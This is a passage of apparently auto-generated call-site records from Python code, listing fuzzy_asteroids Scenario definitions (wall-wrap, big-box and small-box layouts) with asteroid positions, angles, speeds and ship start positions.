'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_right_wrap_4', asteroid_states=[{'position': (750, 0),\n 'angle': -90.0, 'speed': 80}, {'position': (750, 100), 'angle': -90.0,\n 'speed': 80}, {'position': (750, 200), 'angle': -90.0, 'speed': 80}, {\n 'position': (750, 300), 'angle': -90.0, 'speed': 80}, {'position': (750,\n 400), 'angle': -90.0, 'speed': 80}, {'position': (750, 500), 'angle': -\n 90.0, 'speed': 80}, {'position': (750, 600), 'angle': -90.0, 'speed': \n 80}, {'position': (200, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 200, 100), 'angle': -90.0, 'speed': 0}, {'position': (200, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (200, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (200, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (200, 500), 'angle': -90.0, 'speed': 0}, {'position': (200,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (50, 300)},\n seed=0)\n", (20425, 21325), False, 'from fuzzy_asteroids.util import Scenario\n'), ((21629, 22127), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_1"""', 'asteroid_states': "[{'position': (200, 0), 'angle': 90.0, 'speed': 80}, {'position': (200, 100\n ), 
'angle': 90.0, 'speed': 80}, {'position': (200, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 400), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 500), 'angle': 90.0, 'speed': 80}, {'position': (200, 600), 'angle': \n 90.0, 'speed': 80}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_1', asteroid_states=[{'position': (200, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (200, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 300), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 400), 'angle': 90.0, 'speed': 80}, {'position': (200, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (200, 600), 'angle': 90.0, 'speed': 80\n }], ship_state={'position': (50, 300)}, seed=0)\n", (21637, 22127), False, 'from fuzzy_asteroids.util import Scenario\n'), ((22288, 22781), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_2"""', 'asteroid_states': "[{'position': (50, 0), 'angle': 90.0, 'speed': 80}, {'position': (50, 100),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 400), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 500), 'angle': 90.0, 'speed': 80}, {'position': (50, 600), 'angle': \n 90.0, 'speed': 80}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_2', asteroid_states=[{'position': (50, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 300), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 400), 'angle': 90.0, 'speed': 80}, {'position': (50, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (50, 600), 'angle': 90.0, 'speed': 80}\n ], ship_state={'position': (750, 300)}, seed=0)\n", (22296, 22781), False, 'from fuzzy_asteroids.util import Scenario\n'), ((22941, 23841), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_3"""', 'asteroid_states': "[{'position': (200, 0), 'angle': 90.0, 'speed': 80}, {'position': (200, 100\n ), 'angle': 90.0, 'speed': 80}, {'position': (200, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 400), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 500), 'angle': 90.0, 'speed': 80}, {'position': (200, 600), 'angle': \n 90.0, 'speed': 80}, {'position': (600, 0), 'angle': -90.0, 'speed': 0},\n {'position': (600, 100), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 200), 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0},\n {'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (50, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_3', asteroid_states=[{'position': (200, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (200, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (200, 300), 'angle': 90.0, 'speed': 80}, {'position': (200,\n 400), 'angle': 90.0, 'speed': 80}, {'position': (200, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (200, 600), 'angle': 90.0, 'speed': 80\n }, {'position': (600, 0), 'angle': -90.0, 'speed': 0}, {'position': (\n 600, 100), 'angle': -90.0, 'speed': 0}, 
{'position': (600, 200),\n 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -90.0,\n 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0}, {\n 'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}], ship_state={'position': (50, 300)},\n seed=0)\n", (22949, 23841), False, 'from fuzzy_asteroids.util import Scenario\n'), ((24123, 25014), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_left_wrap_4"""', 'asteroid_states': "[{'position': (50, 0), 'angle': 90.0, 'speed': 80}, {'position': (50, 100),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 200), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 300), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 400), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 500), 'angle': 90.0, 'speed': 80}, {'position': (50, 600), 'angle': \n 90.0, 'speed': 80}, {'position': (600, 0), 'angle': -90.0, 'speed': 0},\n {'position': (600, 100), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 200), 'angle': -90.0, 'speed': 0}, {'position': (600, 300), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 400), 'angle': -90.0, 'speed': 0},\n {'position': (600, 500), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 600), 'angle': -90.0, 'speed': 0}]", 'ship_state': "{'position': (750, 300)}", 'seed': '(0)'}), "(name='wall_left_wrap_4', asteroid_states=[{'position': (50, 0),\n 'angle': 90.0, 'speed': 80}, {'position': (50, 100), 'angle': 90.0,\n 'speed': 80}, {'position': (50, 200), 'angle': 90.0, 'speed': 80}, {\n 'position': (50, 300), 'angle': 90.0, 'speed': 80}, {'position': (50, \n 400), 'angle': 90.0, 'speed': 80}, {'position': (50, 500), 'angle': \n 90.0, 'speed': 80}, {'position': (50, 600), 'angle': 90.0, 'speed': 80},\n {'position': (600, 0), 'angle': -90.0, 'speed': 0}, {'position': (600, \n 100), 'angle': -90.0, 'speed': 0}, {'position': (600, 200), 'angle': -\n 90.0, 'speed': 0}, {'position': (600, 300), 'angle': -90.0, 'speed': 0},\n {'position': (600, 400), 'angle': -90.0, 'speed': 0}, {'position': (600,\n 500), 'angle': -90.0, 'speed': 0}, {'position': (600, 600), 'angle': -\n 90.0, 'speed': 0}], ship_state={'position': (750, 300)}, seed=0)\n", (24131, 25014), False, 'from fuzzy_asteroids.util import Scenario\n'), ((25319, 25925), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_1"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_top_wrap_1', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}], ship_state={'position': (400, 550)},\n seed=0)\n", 
(25327, 25925), False, 'from fuzzy_asteroids.util import Scenario\n'), ((26118, 26723), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_2"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_top_wrap_2', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}], ship_state={'position': (400, 50)},\n seed=0)\n", (26126, 26723), False, 'from fuzzy_asteroids.util import Scenario\n'), ((26916, 28016), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_3"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}, {'position': (0, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (100, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 200), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (500, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 200), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_top_wrap_3', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (0, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (400, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (700, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 200), 
'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 550)}, seed=0)\n", (26924, 28016), False, 'from fuzzy_asteroids.util import Scenario\n'), ((28370, 29469), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_top_wrap_4"""', 'asteroid_states': "[{'position': (0, 400), 'angle': 0.0, 'speed': 80}, {'position': (100, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (300, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 80}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (700, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 80}, {'position': (0, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (100, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 200), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (500, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 200), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_top_wrap_4', asteroid_states=[{'position': (0, 400),\n 'angle': 0.0, 'speed': 80}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (200, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 80}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 80}, {'position': (600, 400), 'angle': 0.0, 'speed': 80}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 80}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 80}, {'position': (0, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 200), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (400, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (700, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 200), 'angle': 0.0,\n 'speed': 0}], ship_state={'position': (400, 50)}, seed=0)\n", (28378, 29469), False, 'from fuzzy_asteroids.util import Scenario\n'), ((29850, 30475), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_1"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_1', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 
'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}], ship_state={'position': (400,\n 50)}, seed=0)\n", (29858, 30475), False, 'from fuzzy_asteroids.util import Scenario\n'), ((30672, 31298), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_2"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_2', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}], ship_state={'position': (400,\n 550)}, seed=0)\n", (30680, 31298), False, 'from fuzzy_asteroids.util import Scenario\n'), ((31495, 32618), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_3"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (0, 400), 'angle': 0.0, 'speed': 0}, {'position': (100, 400\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 0}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (700, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 50)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_3', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}, {'position': (0, 400),\n 'angle': 0.0, 'speed': 0}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 
400), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}], ship_state={'position': (400, 50)},\n seed=0)\n", (31503, 32618), False, 'from fuzzy_asteroids.util import Scenario\n'), ((32972, 34096), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""wall_bottom_wrap_4"""', 'asteroid_states': "[{'position': (0, 200), 'angle': 180.0, 'speed': 80}, {'position': (100, \n 200), 'angle': 180.0, 'speed': 80}, {'position': (200, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (300, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (400, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (500, 200), 'angle': 180.0, 'speed': 80}, {'position': (600, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (700, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (800, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (0, 400), 'angle': 0.0, 'speed': 0}, {'position': (100, 400\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 400), 'angle': 0.0, 'speed': 0}, {'position': (500, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (700, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 400), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 550)}", 'seed': '(0)'}), "(name='wall_bottom_wrap_4', asteroid_states=[{'position': (0, 200),\n 'angle': 180.0, 'speed': 80}, {'position': (100, 200), 'angle': 180.0,\n 'speed': 80}, {'position': (200, 200), 'angle': 180.0, 'speed': 80}, {\n 'position': (300, 200), 'angle': 180.0, 'speed': 80}, {'position': (400,\n 200), 'angle': 180.0, 'speed': 80}, {'position': (500, 200), 'angle': \n 180.0, 'speed': 80}, {'position': (600, 200), 'angle': 180.0, 'speed': \n 80}, {'position': (700, 200), 'angle': 180.0, 'speed': 80}, {'position':\n (800, 200), 'angle': 180.0, 'speed': 80}, {'position': (0, 400),\n 'angle': 0.0, 'speed': 0}, {'position': (100, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 400), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (500, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 400), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}], ship_state={'position': (400, 550)},\n seed=0)\n", (32980, 34096), False, 'from fuzzy_asteroids.util import Scenario\n'), ((34487, 36091), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""big_box"""', 'asteroid_states': "[{'position': (100, 600), 'angle': 0.0, 'speed': 0}, {'position': (200, 600\n ), 'angle': 0.0, 'speed': 0}, {'position': (300, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 600), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (700, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (100, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 0), 'angle': 0.0, 'speed': 0}, {'position': (300, 0),\n 'angle': 0.0, 'speed': 0}, {'position': (400, 0), 'angle': 0.0, 'speed':\n 0}, {'position': (500, 0), 'angle': 0.0, 'speed': 0}, {'position': (600,\n 0), 'angle': 0.0, 
'speed': 0}, {'position': (700, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (0, 0), 'angle': 0.0, 'speed': 0}, {'position': (0, 100),\n 'angle': 0.0, 'speed': 0}, {'position': (0, 200), 'angle': 0.0, 'speed':\n 0}, {'position': (0, 300), 'angle': 0.0, 'speed': 0}, {'position': (0, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (0, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (0, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 100), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (800, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 500), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 600), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='big_box', asteroid_states=[{'position': (100, 600), 'angle':\n 0.0, 'speed': 0}, {'position': (200, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (300, 600), 'angle': 0.0, 'speed': 0}, {'position': (400, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (500, 600), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 600), 'angle': 0.0, 'speed': 0}, {\n 'position': (700, 600), 'angle': 0.0, 'speed': 0}, {'position': (100, 0\n ), 'angle': 0.0, 'speed': 0}, {'position': (200, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (300, 0), 'angle': 0.0, 'speed': 0}, {\n 'position': (400, 0), 'angle': 0.0, 'speed': 0}, {'position': (500, 0),\n 'angle': 0.0, 'speed': 0}, {'position': (600, 0), 'angle': 0.0, 'speed':\n 0}, {'position': (700, 0), 'angle': 0.0, 'speed': 0}, {'position': (800,\n 0), 'angle': 0.0, 'speed': 0}, {'position': (0, 0), 'angle': 0.0,\n 'speed': 0}, {'position': (0, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (0, 200), 'angle': 0.0, 'speed': 0}, {'position': (0, 300),\n 'angle': 0.0, 'speed': 0}, {'position': (0, 400), 'angle': 0.0, 'speed':\n 0}, {'position': (0, 500), 'angle': 0.0, 'speed': 0}, {'position': (0, \n 600), 'angle': 0.0, 'speed': 0}, {'position': (800, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 200), 'angle': 0.0, 'speed': 0}, {\n 'position': (800, 300), 'angle': 0.0, 'speed': 0}, {'position': (800, \n 400), 'angle': 0.0, 'speed': 0}, {'position': (800, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (800, 600), 'angle': 0.0, 'speed': 0}],\n ship_state={'position': (400, 300)}, seed=0)\n", (34495, 36091), False, 'from fuzzy_asteroids.util import Scenario\n'), ((36671, 37652), 'fuzzy_asteroids.util.Scenario', 'Scenario', ([], {'name': '"""small_box"""', 'asteroid_states': "[{'position': (200, 500), 'angle': 0.0, 'speed': 0}, {'position': (300, 500\n ), 'angle': 0.0, 'speed': 0}, {'position': (400, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 500), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 100), 'angle': 0.0, 'speed': 0}, {'position': (300, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (400, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (500, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 100), 'angle': 0.0, 'speed': 0}, {'position': (200, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (200, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 200), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 300), 'angle': 0.0, 'speed': 0}, {'position': (600, 400), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 500), 'angle': 0.0, 'speed': 0}]", 'ship_state': "{'position': (400, 300)}", 'seed': '(0)'}), "(name='small_box', 
asteroid_states=[{'position': (200, 500),\n 'angle': 0.0, 'speed': 0}, {'position': (300, 500), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 500), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 500), 'angle': 0.0, 'speed': 0}, {'position': (200, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (300, 100), 'angle': 0.0,\n 'speed': 0}, {'position': (400, 100), 'angle': 0.0, 'speed': 0}, {\n 'position': (500, 100), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 100), 'angle': 0.0, 'speed': 0}, {'position': (200, 200), 'angle': 0.0,\n 'speed': 0}, {'position': (200, 300), 'angle': 0.0, 'speed': 0}, {\n 'position': (200, 400), 'angle': 0.0, 'speed': 0}, {'position': (600, \n 200), 'angle': 0.0, 'speed': 0}, {'position': (600, 300), 'angle': 0.0,\n 'speed': 0}, {'position': (600, 400), 'angle': 0.0, 'speed': 0}, {\n 'position': (600, 500), 'angle': 0.0, 'speed': 0}], ship_state={\n 